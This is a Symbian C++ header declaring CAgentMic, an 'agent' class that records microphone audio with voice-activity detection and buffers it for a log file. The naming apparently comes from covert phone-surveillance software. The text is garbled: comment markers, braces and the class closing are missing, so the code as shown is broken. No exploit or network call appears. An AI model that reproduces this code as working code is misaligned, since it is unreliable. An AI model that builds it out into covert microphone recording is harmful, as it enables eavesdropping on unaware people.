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Test Coverage
 * AgentMic.h
 *  Created on: 29/ago/2010
 *      Author: Giovanna

 * This code is based on:
 * S60 Platform: Audio Streaming Example v2.1 
 * http://www.forum.nokia.com/info/sw.nokia.com/id/4ed27119-e08e-480e-b0b8-aeb48fe5c5e8/S60_Platform_Audio_Streaming_Example_v2_1_en.zip.html

#ifndef AGENTMIC_H_
#define AGENTMIC_H_

#include "AbstractAgent.h"
#include "AdditionalDataStructs.h"
#include <MdaAudioInputStream.h>
#include <mda\common\audio.h>
#include <mmf\common\mmfutilities.h>


 *  CAgentMic
class CAgentMic : public CAbstractAgent, public MMdaAudioInputStreamCallback
    // Constructors and destructor

     * Destructor.

     * Two-phased constructor.
    static CAgentMic* NewL(const TDesC8& params);

     * Two-phased constructor.
    static CAgentMic* NewLC(const TDesC8& params);
    // From AbstractQueueEndPoint
    virtual void StartAgentCmdL();
    virtual void StopAgentCmdL();
     * Constructor for performing 1st stage construction

     * EPOC default constructor for performing 2nd stage construction
    void ConstructL(const TDesC8& params);
     * MaiscOpenComplete()
     * A callback function that is called when 
     * CMdaAudioInputStream::Open() has completed, indicating that the audio 
     * input stream is ready for use.
    virtual void MaiscOpenComplete(TInt aError);

     * MaiscBufferCopied()
     * A callback function that is called when a chunk of audio data 
     * has been copied to the descriptor specified in a 
     * CMdaAudioInputStream::ReadL().
    virtual void MaiscBufferCopied(TInt aError, const TDesC8& aBuffer);
     * MaiscRecordComplete()
     * A callback function that is called when the input stream is
     * closed using CMdaAudioInputStream::Stop(). 
    virtual void MaiscRecordComplete(TInt aError);
     * Used to convert Symbian time into Windows filetime.
    //TInt64 GetFiletime(TTime aCurrentUtcTime);

private: // data members
    TBool iVadActive;
    TUint32 iVadThreshold;
    // audio input stream object reference
    CMdaAudioInputStream* iInputStream;
    // The default encoding used 
    TFourCC iDefaultEncoding;
    // Audio data stream settings for input stream
    TMdaAudioDataSettings iStreamSettings;
    // Buffers used during recording
    RPointerArray<TDes8>    iStreamBufferArray;
    TInt iStreamIdx;
    // Data to be written into log file
    HBufC8* iRecData;
    // Frames counter
    TInt iFramesCounter;
    TMicAdditionalData iMicAdditionalData;  

#endif /* AGENTMIC_H_ */